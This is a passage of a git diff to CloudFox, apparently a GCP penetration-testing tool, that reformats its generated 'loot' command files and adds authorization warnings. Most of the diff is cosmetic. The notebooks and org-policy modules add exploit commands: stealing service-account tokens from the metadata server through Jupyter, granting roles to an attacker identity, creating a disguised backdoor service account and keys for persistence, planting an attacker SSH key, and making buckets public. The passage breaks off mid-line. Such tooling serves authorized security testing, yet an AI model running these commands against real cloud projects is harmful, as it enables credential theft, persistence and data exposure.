+209,20 @@ func (m *KMSModule) addKeyToLoot(projectID string, key KMSService.CryptoKeyInfo) } lootFile.Contents += fmt.Sprintf( - "## Key: %s (Project: %s, KeyRing: %s, Location: %s)\n"+ + "# =============================================================================\n"+ + "# KMS KEY: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, KeyRing: %s, Location: %s\n"+ "# Purpose: %s, Protection: %s\n", - key.Name, key.ProjectID, - key.KeyRing, key.Location, + key.Name, + key.ProjectID, key.KeyRing, key.Location, key.Purpose, key.ProtectionLevel, ) // Commands lootFile.Contents += fmt.Sprintf( - "\n# Describe key:\n"+ + "\n# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe key:\n"+ "gcloud kms keys describe %s --keyring=%s --location=%s --project=%s\n"+ "# Get IAM policy:\n"+ "gcloud kms keys get-iam-policy %s --keyring=%s --location=%s --project=%s\n"+ @@ -230,6 +234,7 @@ func (m *KMSModule) addKeyToLoot(projectID string, key KMSService.CryptoKeyInfo) ) // Purpose-specific commands + lootFile.Contents += "\n# === EXPLOIT COMMANDS ===\n\n" switch key.Purpose { case "ENCRYPT_DECRYPT": lootFile.Contents += fmt.Sprintf( diff --git a/gcp/commands/lateralmovement.go b/gcp/commands/lateralmovement.go index e1249d58..e59cb6b2 100755 --- a/gcp/commands/lateralmovement.go +++ b/gcp/commands/lateralmovement.go @@ -229,7 +229,7 @@ func (m *LateralMovementModule) initializeLootForProject(projectID string) { m.LootMap[projectID] = make(map[string]*internal.LootFile) m.LootMap[projectID]["lateral-movement-commands"] = &internal.LootFile{ Name: "lateral-movement-commands", - Contents: "# Lateral Movement Exploit Commands\n# Generated by CloudFox\n\n", + Contents: "# Lateral Movement Exploit Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } } @@ -285,14 +285,17 @@ func (m *LateralMovementModule) generatePlaybookForProject(projectID string) *in var sb strings.Builder sb.WriteString("# GCP Lateral Movement Commands\n") sb.WriteString(fmt.Sprintf("# Project: %s\n", projectID)) - sb.WriteString("# Generated by CloudFox\n\n") + sb.WriteString("# Generated by CloudFox\n") + sb.WriteString("# WARNING: Only use with proper authorization\n\n") // Token theft vectors for this project if paths, ok := m.ProjectPaths[projectID]; ok && len(paths) > 0 { - sb.WriteString("## Token Theft Vectors\n\n") + sb.WriteString("# === TOKEN THEFT VECTORS ===\n\n") for _, path := range paths { - sb.WriteString(fmt.Sprintf("### %s -> %s\n", path.Source, path.Target)) + sb.WriteString(fmt.Sprintf("# =============================================================================\n"+ + "# %s -> %s\n"+ + "# =============================================================================\n", path.Source, path.Target)) sb.WriteString(fmt.Sprintf("# Method: %s\n", path.Method)) sb.WriteString(fmt.Sprintf("# Category: %s\n", path.Category)) if path.ExploitCommand != "" { @@ -321,11 +324,13 @@ func (m *LateralMovementModule) generatePlaybookForProject(projectID string) *in } if !hasFindings { - sb.WriteString("## Permission-Based Lateral Movement Commands\n\n") + sb.WriteString("# === PERMISSION-BASED LATERAL MOVEMENT ===\n\n") hasFindings = true } - sb.WriteString(fmt.Sprintf("### %s (%s)\n", finding.Permission, finding.Category)) + sb.WriteString(fmt.Sprintf("# =============================================================================\n"+ + "# %s (%s)\n"+ + "# =============================================================================\n", finding.Permission, finding.Category)) sb.WriteString(fmt.Sprintf("# %s\n\n", finding.Description)) for _, p := range relevantPrincipals { @@ -343,7 +348,7 @@ func (m *LateralMovementModule) generatePlaybookForProject(projectID string) *in } } - sb.WriteString(fmt.Sprintf("## %s (%s)\n", p.Principal, principalType)) + sb.WriteString(fmt.Sprintf("# %s (%s)\n", p.Principal, principalType)) if p.IsServiceAccount { sb.WriteString(fmt.Sprintf("# Impersonate first:\ngcloud config set auth/impersonate_service_account %s\n\n", p.Principal)) @@ -361,7 +366,7 @@ func (m *LateralMovementModule) generatePlaybookForProject(projectID string) *in } contents := sb.String() - if contents == fmt.Sprintf("# GCP Lateral Movement Commands\n# Project: %s\n# Generated by CloudFox\n\n", projectID) { + if contents == fmt.Sprintf("# GCP Lateral Movement Commands\n# Project: %s\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", projectID) { return nil } @@ -711,12 +716,16 @@ func (m *LateralMovementModule) addPathToLoot(path LateralMovementPath, projectI return } lootFile.Contents += fmt.Sprintf( - "# Method: %s\n"+ + "# =============================================================================\n"+ + "# %s -> %s\n"+ + "# =============================================================================\n"+ + "# Method: %s\n"+ "# Category: %s\n"+ "# Source: %s (%s)\n"+ "# Target: %s\n"+ "# Permissions: %s\n"+ "%s\n\n", + path.Source, path.Target, path.Method, path.Category, path.Source, path.SourceType, diff --git a/gcp/commands/loadbalancers.go b/gcp/commands/loadbalancers.go index dad182ef..1de55423 100755 --- a/gcp/commands/loadbalancers.go +++ b/gcp/commands/loadbalancers.go @@ -176,10 +176,15 @@ func (m *LoadBalancersModule) addToLoot(projectID string, lb loadbalancerservice return } lootFile.Contents += fmt.Sprintf( - "#### Load Balancer: %s (Project: %s)\n"+ + "# =============================================================================\n"+ + "# LOAD BALANCER: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ "# Type: %s, Scheme: %s, IP: %s, Port: %s\n\n", lb.Name, lb.ProjectID, lb.Type, lb.Scheme, lb.IPAddress, lb.Port) + lootFile.Contents += "# === ENUMERATION COMMANDS ===\n\n" + // Describe forwarding rule if lb.Region == "global" { lootFile.Contents += fmt.Sprintf( diff --git a/gcp/commands/logging.go b/gcp/commands/logging.go index 16117bea..38e61632 100644 --- a/gcp/commands/logging.go +++ b/gcp/commands/logging.go @@ -214,7 +214,7 @@ func (m *LoggingModule) processProject(ctx context.Context, projectID string, lo m.LootMap[projectID] = make(map[string]*internal.LootFile) m.LootMap[projectID]["logging-commands"] = &internal.LootFile{ Name: "logging-commands", - Contents: "# Cloud Logging Enumeration Commands\n# Generated by CloudFox\n\n", + Contents: "# Cloud Logging Enumeration Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } @@ -236,10 +236,13 @@ func (m *LoggingModule) generateLootCommands(projectID string, sinks []LoggingSe } // Project-level logging enumeration - lootFile.Contents += fmt.Sprintf("## Project: %s\n\n", projectID) + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# PROJECT: %s\n"+ + "# =============================================================================\n\n", projectID) // Sinks enumeration commands - lootFile.Contents += "# ===== Log Sinks =====\n" + lootFile.Contents += "# === LOG SINKS ===\n\n" lootFile.Contents += fmt.Sprintf("gcloud logging sinks list --project=%s\n\n", projectID) for _, sink := range sinks { @@ -278,7 +281,7 @@ func (m *LoggingModule) generateLootCommands(projectID string, sinks []LoggingSe // Metrics enumeration commands if len(metrics) > 0 { - lootFile.Contents += "# ===== Log-based Metrics =====\n" + lootFile.Contents += "# === LOG-BASED METRICS ===\n\n" lootFile.Contents += fmt.Sprintf("gcloud logging metrics list --project=%s\n\n", projectID) for _, metric := range metrics { @@ -289,7 +292,7 @@ func (m *LoggingModule) generateLootCommands(projectID string, sinks []LoggingSe // Logging gaps enumeration commands if len(gaps) > 0 { - lootFile.Contents += "# ===== Logging Configuration Gaps =====\n" + lootFile.Contents += "# === LOGGING GAPS ===\n\n" lootFile.Contents += "# Commands to verify logging configuration on resources with gaps\n\n" for _, gap := range gaps { @@ -521,7 +524,7 @@ func (m *LoggingModule) writeHierarchicalOutput(ctx context.Context, logger inte var lootFiles []internal.LootFile if projectLoot, ok := m.LootMap[projectID]; ok { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -583,7 +586,7 @@ func (m *LoggingModule) writeFlatOutput(ctx context.Context, logger internal.Log var lootFiles []internal.LootFile for _, projectLoot := range m.LootMap { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/memorystore.go b/gcp/commands/memorystore.go index 8300892e..3d748cec 100644 --- a/gcp/commands/memorystore.go +++ b/gcp/commands/memorystore.go @@ -125,17 +125,22 @@ func (m *MemorystoreModule) addInstanceToLoot(projectID string, instance memorys return } lootFile.Contents += fmt.Sprintf( - "## Instance: %s (Project: %s, Location: %s)\n"+ + "# =============================================================================\n"+ + "# MEMORYSTORE: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Location: %s\n"+ "# Host: %s:%d\n"+ "# Auth: %v, Encryption: %s\n\n", - instance.Name, instance.ProjectID, instance.Location, + instance.Name, + instance.ProjectID, instance.Location, instance.Host, instance.Port, instance.AuthEnabled, instance.TransitEncryption, ) // gcloud commands lootFile.Contents += fmt.Sprintf( - "# Describe instance:\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe instance:\n"+ "gcloud redis instances describe %s --region=%s --project=%s\n\n", instance.Name, instance.Location, instance.ProjectID, ) @@ -150,6 +155,7 @@ func (m *MemorystoreModule) addInstanceToLoot(projectID string, instance memorys } // Redis CLI connection command + lootFile.Contents += "# === EXPLOIT COMMANDS ===\n\n" authStr := "" if instance.AuthEnabled { authStr = " -a $(gcloud redis instances get-auth-string " + instance.Name + diff --git a/gcp/commands/monitoringalerts.go b/gcp/commands/monitoringalerts.go index 844ea12c..abd8f4c5 100644 --- a/gcp/commands/monitoringalerts.go +++ b/gcp/commands/monitoringalerts.go @@ -487,10 +487,15 @@ func (m *MonitoringAlertsModule) addPolicyToLoot(projectID string, p AlertPolicy return } lootFile.Contents += fmt.Sprintf( - "## Policy: %s (Project: %s)\n"+ + "# =============================================================================\n"+ + "# POLICY: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ "# Describe alert policy:\n"+ "gcloud alpha monitoring policies describe %s --project=%s\n\n", - p.DisplayName, p.ProjectID, + p.DisplayName, + p.ProjectID, extractResourceName(p.Name), p.ProjectID, ) } @@ -501,10 +506,15 @@ func (m *MonitoringAlertsModule) addChannelToLoot(projectID string, c Notificati return } lootFile.Contents += fmt.Sprintf( - "## Channel: %s (Project: %s)\n"+ + "# =============================================================================\n"+ + "# CHANNEL: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ "# Describe notification channel:\n"+ "gcloud alpha monitoring channels describe %s --project=%s\n\n", - c.DisplayName, c.ProjectID, + c.DisplayName, + c.ProjectID, extractResourceName(c.Name), c.ProjectID, ) } @@ -515,10 +525,15 @@ func (m *MonitoringAlertsModule) addUptimeCheckToLoot(projectID string, u Uptime return } lootFile.Contents += fmt.Sprintf( - "## Uptime Check: %s (Project: %s)\n"+ + "# =============================================================================\n"+ + "# UPTIME CHECK: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ "# Describe uptime check:\n"+ "gcloud alpha monitoring uptime describe %s --project=%s\n\n", - u.DisplayName, u.ProjectID, + u.DisplayName, + u.ProjectID, extractResourceName(u.Name), u.ProjectID, ) } diff --git a/gcp/commands/networktopology.go b/gcp/commands/networktopology.go index 88d65441..7b0bd7f7 100644 --- a/gcp/commands/networktopology.go +++ b/gcp/commands/networktopology.go @@ -274,7 +274,7 @@ func (m *NetworkTopologyModule) processProject(ctx context.Context, projectID st m.LootMap[projectID] = make(map[string]*internal.LootFile) m.LootMap[projectID]["network-topology-commands"] = &internal.LootFile{ Name: "network-topology-commands", - Contents: "# Network Topology Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + Contents: "# Network Topology Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n# See also: vpcnetworks-commands for quick enumeration and cross-project peering\n\n", } } m.mu.Unlock() @@ -1232,14 +1232,19 @@ func (m *NetworkTopologyModule) addNetworkToLoot(projectID string, n VPCNetwork) return } lootFile.Contents += fmt.Sprintf( - "## VPC Network: %s (Project: %s)\n"+ + "# =============================================================================\n"+ + "# VPC NETWORK: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ "# Describe network:\n"+ "gcloud compute networks describe %s --project=%s\n\n"+ "# List subnets in network:\n"+ "gcloud compute networks subnets list --network=%s --project=%s\n\n"+ "# List firewall rules for network:\n"+ "gcloud compute firewall-rules list --filter=\"network:%s\" --project=%s\n\n", - n.Name, n.ProjectID, + n.Name, + n.ProjectID, n.Name, n.ProjectID, n.Name, n.ProjectID, n.Name, n.ProjectID, @@ -1252,12 +1257,17 @@ func (m *NetworkTopologyModule) addSubnetToLoot(projectID string, s Subnet) { return } lootFile.Contents += fmt.Sprintf( - "## Subnet: %s (Project: %s, Region: %s)\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# SUBNET: %s\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Project: %s, Region: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ "# Describe subnet:\n"+ "gcloud compute networks subnets describe %s --region=%s --project=%s\n\n"+ "# Get subnet IAM policy:\n"+ "gcloud compute networks subnets get-iam-policy %s --region=%s --project=%s\n\n", - s.Name, s.ProjectID, s.Region, + s.Name, + s.ProjectID, s.Region, s.Name, s.Region, s.ProjectID, s.Name, s.Region, s.ProjectID, ) @@ -1269,15 +1279,20 @@ func (m *NetworkTopologyModule) addPeeringToLoot(projectID string, p VPCPeering) return } lootFile.Contents += fmt.Sprintf( - "## VPC Peering: %s (Project: %s)\n"+ - "# Local: %s -> Peer: %s (project: %s)\n"+ + "# =============================================================================\n"+ + "# VPC PEERING: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Local: %s -> Peer: %s (project: %s)\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ "# List peerings:\n"+ "gcloud compute networks peerings list --project=%s\n\n"+ "# List peering routes (incoming):\n"+ "gcloud compute networks peerings list-routes %s --project=%s --network=%s --region=REGION --direction=INCOMING\n\n"+ "# List peering routes (outgoing):\n"+ "gcloud compute networks peerings list-routes %s --project=%s --network=%s --region=REGION --direction=OUTGOING\n\n", - p.Name, p.ProjectID, + p.Name, + p.ProjectID, m.extractNetworkName(p.Network), m.extractNetworkName(p.PeerNetwork), p.PeerProjectID, p.ProjectID, p.Name, p.ProjectID, m.extractNetworkName(p.Network), @@ -1291,12 +1306,17 @@ func (m *NetworkTopologyModule) addNATToLoot(projectID string, nat CloudNATConfi return } lootFile.Contents += fmt.Sprintf( - "## Cloud NAT: %s (Project: %s, Region: %s)\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# CLOUD NAT: %s\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Project: %s, Region: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ "# Describe router with NAT config:\n"+ "gcloud compute routers describe ROUTER_NAME --region=%s --project=%s\n\n"+ "# List NAT mappings:\n"+ "gcloud compute routers get-nat-mapping-info ROUTER_NAME --region=%s --project=%s\n\n", - nat.Name, nat.ProjectID, nat.Region, + nat.Name, + nat.ProjectID, nat.Region, nat.Region, nat.ProjectID, nat.Region, nat.ProjectID, ) @@ -1308,8 +1328,11 @@ func (m *NetworkTopologyModule) addSharedVPCToLoot(projectID string, config *Sha return } lootFile.Contents += fmt.Sprintf( - "## Shared VPC Host: %s\n"+ - "# Service Projects: %v\n"+ + "# =============================================================================\n"+ + "# SHARED VPC HOST: %s\n"+ + "# =============================================================================\n"+ + "# Service Projects: %v\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ "# List Shared VPC resources:\n"+ "gcloud compute shared-vpc list-associated-resources %s\n\n"+ "# Get host project for service project:\n"+ diff --git a/gcp/commands/notebooks.go b/gcp/commands/notebooks.go index cda8fe5a..26076d0b 100644 --- a/gcp/commands/notebooks.go +++ b/gcp/commands/notebooks.go @@ -156,10 +156,14 @@ func (m *NotebooksModule) addToLoot(projectID string, instance notebooksservice. return } lootFile.Contents += fmt.Sprintf( - "## Instance: %s (Project: %s, Location: %s)\n"+ + "# =============================================================================\n"+ + "# NOTEBOOK: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Location: %s\n"+ "# State: %s, Service Account: %s\n"+ "# Public IP: %s, Proxy Access: %s\n", - instance.Name, instance.ProjectID, instance.Location, + instance.Name, + instance.ProjectID, instance.Location, instance.State, instance.ServiceAccount, shared.BoolToYesNo(!instance.NoPublicIP), shared.BoolToYesNo(!instance.NoProxyAccess), ) @@ -169,18 +173,81 @@ func (m *NotebooksModule) addToLoot(projectID string, instance notebooksservice. "# Proxy URI: %s\n", instance.ProxyUri) } - lootFile.Contents += fmt.Sprintf( - "\n# Describe instance:\n"+ - "gcloud notebooks instances describe %s --location=%s --project=%s\n\n"+ - "# Get JupyterLab proxy URL:\n"+ - "gcloud notebooks instances describe %s --location=%s --project=%s --format='value(proxyUri)'\n\n"+ - "# Start instance (if stopped):\n"+ - "gcloud notebooks instances start %s --location=%s --project=%s\n\n"+ - "# Stop instance:\n"+ - "gcloud notebooks instances stop %s --location=%s --project=%s\n\n", + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe instance: +gcloud notebooks instances describe %s --location=%s --project=%s + +# Get JupyterLab proxy URL: +gcloud notebooks instances describe %s --location=%s --project=%s --format='value(proxyUri)' + +# Start instance (if stopped): +gcloud notebooks instances start %s --location=%s --project=%s + +# Stop instance: +gcloud notebooks instances stop %s --location=%s --project=%s + +# Get instance metadata (service account, network config): +gcloud notebooks instances describe %s --location=%s --project=%s --format=json | jq '{serviceAccount: .serviceAccount, network: .network, subnet: .subnet}' + +`, + instance.Name, instance.Location, instance.ProjectID, + instance.Name, instance.Location, instance.ProjectID, instance.Name, instance.Location, instance.ProjectID, instance.Name, instance.Location, instance.ProjectID, instance.Name, instance.Location, instance.ProjectID, + ) + + // === EXPLOIT COMMANDS === + lootFile.Contents += "# === EXPLOIT COMMANDS ===\n\n" + + // SSH to notebook instance + if !instance.NoPublicIP { + lootFile.Contents += fmt.Sprintf( + "# SSH to notebook instance (runs as SA: %s):\n"+ + "gcloud compute ssh --project=%s --zone=%s notebook-instance-%s\n\n", + instance.ServiceAccount, + instance.ProjectID, instance.Location, instance.Name, + ) + } + lootFile.Contents += fmt.Sprintf( + "# SSH through IAP (if direct SSH blocked or no public IP):\n"+ + "gcloud compute ssh notebook-instance-%s --tunnel-through-iap --project=%s --zone=%s\n\n", + instance.Name, instance.ProjectID, instance.Location, + ) + + // JupyterLab code execution + if instance.ProxyUri != "" { + lootFile.Contents += fmt.Sprintf( + "# Execute code via Jupyter API (runs as SA: %s):\n"+ + "# Access JupyterLab: %s\n\n"+ + "# Create and execute a notebook via Jupyter REST API:\n"+ + "# Step 1: Get Jupyter token (via proxy auth)\n"+ + "# Step 2: Execute arbitrary code:\n"+ + "curl -X POST '%s/api/kernels' -H 'Content-Type: application/json' -d '{\"name\": \"python3\"}'\n\n"+ + "# Execute Python code to steal SA token:\n"+ + "# In JupyterLab terminal or notebook cell:\n"+ + "# import requests\n"+ + "# r = requests.get('http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token', headers={'Metadata-Flavor': 'Google'})\n"+ + "# print(r.json())\n\n", + instance.ServiceAccount, + instance.ProxyUri, + instance.ProxyUri, + ) + } else { + lootFile.Contents += fmt.Sprintf( + "# Start instance to get Jupyter proxy URL, then execute code as SA: %s\n"+ + "gcloud notebooks instances start %s --location=%s --project=%s\n\n", + instance.ServiceAccount, + instance.Name, instance.Location, instance.ProjectID, + ) + } + + // Upload notebook with code execution + lootFile.Contents += fmt.Sprintf( + "# Register an instance (Vertex AI Workbench):\n"+ + "gcloud notebooks instances register %s --location=%s --project=%s\n\n", instance.Name, instance.Location, instance.ProjectID, ) } diff --git a/gcp/commands/organizations.go b/gcp/commands/organizations.go index 0837c5a0..c8682be7 100755 --- a/gcp/commands/organizations.go +++ b/gcp/commands/organizations.go @@ -208,7 +208,7 @@ func (m *OrganizationsModule) Execute(ctx context.Context, logger internal.Logge func (m *OrganizationsModule) initializeLootFiles() { m.LootMap["org-commands"] = &internal.LootFile{ Name: "org-commands", - Contents: "# GCP Organization Commands\n# Generated by CloudFox\n\n", + Contents: "# GCP Organization Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } m.LootMap["org-map"] = &internal.LootFile{ Name: "org-map", @@ -235,14 +235,16 @@ func (m *OrganizationsModule) generateLoot() { m.generateScopeHierarchy() // Gcloud commands for organizations - m.LootMap["org-commands"].Contents += "# ==========================================\n" + m.LootMap["org-commands"].Contents += "# =============================================================================\n" m.LootMap["org-commands"].Contents += "# ORGANIZATION COMMANDS\n" - m.LootMap["org-commands"].Contents += "# ==========================================\n\n" + m.LootMap["org-commands"].Contents += "# =============================================================================\n\n" for _, org := range m.Organizations { orgID := strings.TrimPrefix(org.Name, "organizations/") m.LootMap["org-commands"].Contents += fmt.Sprintf( - "## Organization: %s (%s)\n"+ + "# =============================================================================\n"+ + "# ORGANIZATION: %s (%s)\n"+ + "# =============================================================================\n"+ "gcloud organizations describe %s\n"+ "gcloud organizations get-iam-policy %s\n"+ "gcloud resource-manager folders list --organization=%s\n"+ @@ -257,14 +259,16 @@ func (m *OrganizationsModule) generateLoot() { // Gcloud commands for folders if len(m.Folders) > 0 { - m.LootMap["org-commands"].Contents += "# ==========================================\n" + m.LootMap["org-commands"].Contents += "# =============================================================================\n" m.LootMap["org-commands"].Contents += "# FOLDER COMMANDS\n" - m.LootMap["org-commands"].Contents += "# ==========================================\n\n" + m.LootMap["org-commands"].Contents += "# =============================================================================\n\n" for _, folder := range m.Folders { folderID := strings.TrimPrefix(folder.Name, "folders/") m.LootMap["org-commands"].Contents += fmt.Sprintf( - "## Folder: %s (%s)\n"+ + "# =============================================================================\n"+ + "# FOLDER: %s (%s)\n"+ + "# =============================================================================\n"+ "gcloud resource-manager folders describe %s\n"+ "gcloud resource-manager folders get-iam-policy %s\n"+ "gcloud resource-manager folders list --folder=%s\n"+ diff --git a/gcp/commands/orgpolicies.go b/gcp/commands/orgpolicies.go index 5fc0e8b6..5c9275b2 100644 --- a/gcp/commands/orgpolicies.go +++ b/gcp/commands/orgpolicies.go @@ -135,8 +135,12 @@ func (m *OrgPoliciesModule) addPolicyToLoot(projectID string, policy orgpolicyse } lootFile.Contents += fmt.Sprintf( - "## Constraint: %s (Project: %s)\n", - policy.Constraint, policy.ProjectID, + "# =============================================================================\n"+ + "# CONSTRAINT: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n", + policy.Constraint, + policy.ProjectID, ) if policy.Description != "" { @@ -159,13 +163,114 @@ func (m *OrgPoliciesModule) addPolicyToLoot(projectID string, policy orgpolicyse } lootFile.Contents += fmt.Sprintf( - "\n# Describe this policy:\n"+ + "\n# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe this policy:\n"+ "gcloud org-policies describe %s --project=%s\n\n"+ "# Get effective policy (includes inheritance):\n"+ - "gcloud org-policies describe %s --project=%s --effective\n\n", + "gcloud org-policies describe %s --project=%s --effective\n\n"+ + "# List all constraints for this project:\n"+ + "gcloud org-policies list --project=%s\n\n", constraintName, policy.ProjectID, constraintName, policy.ProjectID, + policy.ProjectID, ) + + // Exploit/bypass commands based on specific constraint types + lootFile.Contents += "# === EXPLOIT / BYPASS COMMANDS ===\n\n" + + switch constraintName { + case "iam.allowedPolicyMemberDomains": + if policy.AllowAll { + lootFile.Contents += "# [FINDING] Domain restriction is DISABLED (AllowAll) - any external identity can be granted access\n" + lootFile.Contents += fmt.Sprintf( + "# Grant access to external identity:\n"+ + "gcloud projects add-iam-policy-binding %s --member=user:attacker@external.com --role=roles/viewer\n\n", + policy.ProjectID, + ) + } else if !policy.Enforced { + lootFile.Contents += "# [FINDING] Domain restriction is NOT ENFORCED\n\n" + } + + case "iam.disableServiceAccountKeyCreation": + if !policy.Enforced || policy.AllowAll { + lootFile.Contents += "# [FINDING] SA key creation is NOT restricted - create keys for persistence:\n" + lootFile.Contents += fmt.Sprintf( + "gcloud iam service-accounts keys create /tmp/sa-key.json --iam-account=SA_EMAIL@%s.iam.gserviceaccount.com\n\n", + policy.ProjectID, + ) + } else { + lootFile.Contents += "# SA key creation is restricted - try alternative persistence methods:\n" + + "# - Workload identity federation\n" + + "# - Service account impersonation chain\n\n" + } + + case "iam.disableServiceAccountCreation": + if !policy.Enforced || policy.AllowAll { + lootFile.Contents += "# [FINDING] SA creation is NOT restricted - create backdoor service accounts:\n" + lootFile.Contents += fmt.Sprintf( + "gcloud iam service-accounts create cloudfox-backdoor --display-name='System Service' --project=%s\n\n", + policy.ProjectID, + ) + } + + case "compute.requireShieldedVm": + if !policy.Enforced || policy.AllowAll { + lootFile.Contents += "# [FINDING] Shielded VM is NOT required - unshielded VMs can be created:\n" + + "# Boot integrity monitoring is not enforced\n\n" + } + + case "compute.requireOsLogin": + if !policy.Enforced || policy.AllowAll { + lootFile.Contents += "# [FINDING] OS Login is NOT required - SSH keys can be added to project/instance metadata:\n" + lootFile.Contents += fmt.Sprintf( + "# Add SSH key to project metadata:\n"+ + "gcloud compute project-info add-metadata --metadata=ssh-keys=\"attacker:ssh-rsa AAAA...\" --project=%s\n\n", + policy.ProjectID, + ) + } + + case "compute.vmExternalIpAccess": + if policy.AllowAll { + lootFile.Contents += "# [FINDING] External IP access is NOT restricted - VMs can have public IPs:\n" + + "# Any VM can be assigned a public IP for data exfiltration\n\n" + } + + case "storage.uniformBucketLevelAccess": + if !policy.Enforced || policy.AllowAll { + lootFile.Contents += "# [FINDING] Uniform bucket access is NOT enforced - ACLs can be used:\n" + + "# Fine-grained ACLs allow per-object permissions that are harder to audit\n\n" + } + + case "storage.publicAccessPrevention": + if !policy.Enforced || policy.AllowAll { + lootFile.Contents += "# [FINDING] Public access prevention is NOT enforced:\n" + lootFile.Contents += fmt.Sprintf( + "# Make a bucket publicly accessible:\n"+ + "gsutil iam ch allUsers:objectViewer gs://BUCKET_NAME\n"+ + "# Or set public ACL:\n"+ + "gsutil acl ch -u AllUsers:R gs://BUCKET_NAME/OBJECT\n\n", + ) + } + + case "sql.restrictPublicIp": + if !policy.Enforced || policy.AllowAll { + lootFile.Contents += "# [FINDING] Public IP restriction is NOT enforced on Cloud SQL:\n" + + "# SQL instances can be created with public IPs\n\n" + } + + case "sql.restrictAuthorizedNetworks": + if !policy.Enforced || policy.AllowAll { + lootFile.Contents += "# [FINDING] Authorized network restriction is NOT enforced:\n" + + "# 0.0.0.0/0 can be added to authorized networks\n\n" + } + + default: + if policy.AllowAll { + lootFile.Contents += fmt.Sprintf("# [FINDING] Policy %s has AllowAll - constraint is effectively disabled\n\n", constraintName) + } else if !policy.Enforced { + lootFile.Contents += fmt.Sprintf("# [FINDING] Policy %s is not enforced\n\n", constraintName) + } + } } func (m *OrgPoliciesModule) writeOutput(ctx context.Context, logger internal.Logger) { diff --git a/gcp/commands/permissions.go b/gcp/commands/permissions.go index 44973ca2..e40a14b5 100755 --- a/gcp/commands/permissions.go +++ b/gcp/commands/permissions.go @@ -483,7 +483,7 @@ func (m *PermissionsModule) addPermissionToLoot(ep ExplodedPermission, if m.OrgLoot[scopeID] == nil { m.OrgLoot[scopeID] = &internal.LootFile{ Name: "permissions-commands", - Contents: "# GCP Permissions Commands (Organization Level)\n# Generated by CloudFox\n\n", + Contents: "# GCP Permissions Commands (Organization Level)\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } lootFile = m.OrgLoot[scopeID] @@ -496,7 +496,7 @@ func (m *PermissionsModule) addPermissionToLoot(ep ExplodedPermission, if m.FolderLoot[scopeID] == nil { m.FolderLoot[scopeID] = &internal.LootFile{ Name: "permissions-commands", - Contents: "# GCP Permissions Commands (Folder Level)\n# Generated by CloudFox\n\n", + Contents: "# GCP Permissions Commands (Folder Level)\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } lootFile = m.FolderLoot[scopeID] @@ -509,7 +509,7 @@ func (m *PermissionsModule) addPermissionToLoot(ep ExplodedPermission, if m.ProjectLoot[scopeID] == nil { m.ProjectLoot[scopeID] = &internal.LootFile{ Name: "permissions-commands", - Contents: "# GCP Permissions Commands (Project Level)\n# Generated by CloudFox\n\n", + Contents: "# GCP Permissions Commands (Project Level)\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } lootFile = m.ProjectLoot[scopeID] @@ -579,7 +579,7 @@ func isHighPrivilegePermission(permission string) bool { func (m *PermissionsModule) initializeEnumerationLoot() { m.EnumLoot.Contents = "# GCP Permissions Enumeration Commands\n" m.EnumLoot.Contents += "# Generated by CloudFox\n" - m.EnumLoot.Contents += "# Use these commands to enumerate entities, roles, and permissions\n\n" + m.EnumLoot.Contents += "# WARNING: Only use with proper authorization\n\n" } // collectAllLootFiles collects all loot files for org-level output (all scopes combined) @@ -589,7 +589,7 @@ func (m *PermissionsModule) collectAllLootFiles() []internal.LootFile { // Combine all org, folder, and project loot into one file for org-level output combinedLoot := &internal.LootFile{ Name: "permissions-commands", - Contents: "# GCP Permissions Commands (All Scopes)\n# Generated by CloudFox\n\n", + Contents: "# GCP Permissions Commands (All Scopes)\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } // Add org-level loot @@ -652,7 +652,7 @@ func (m *PermissionsModule) collectLootFilesForProject(projectID string) []inter combinedLoot := &internal.LootFile{ Name: "permissions-commands", - Contents: "# GCP Permissions Commands\n# Generated by CloudFox\n\n", + Contents: "# GCP Permissions Commands\n# Generated by 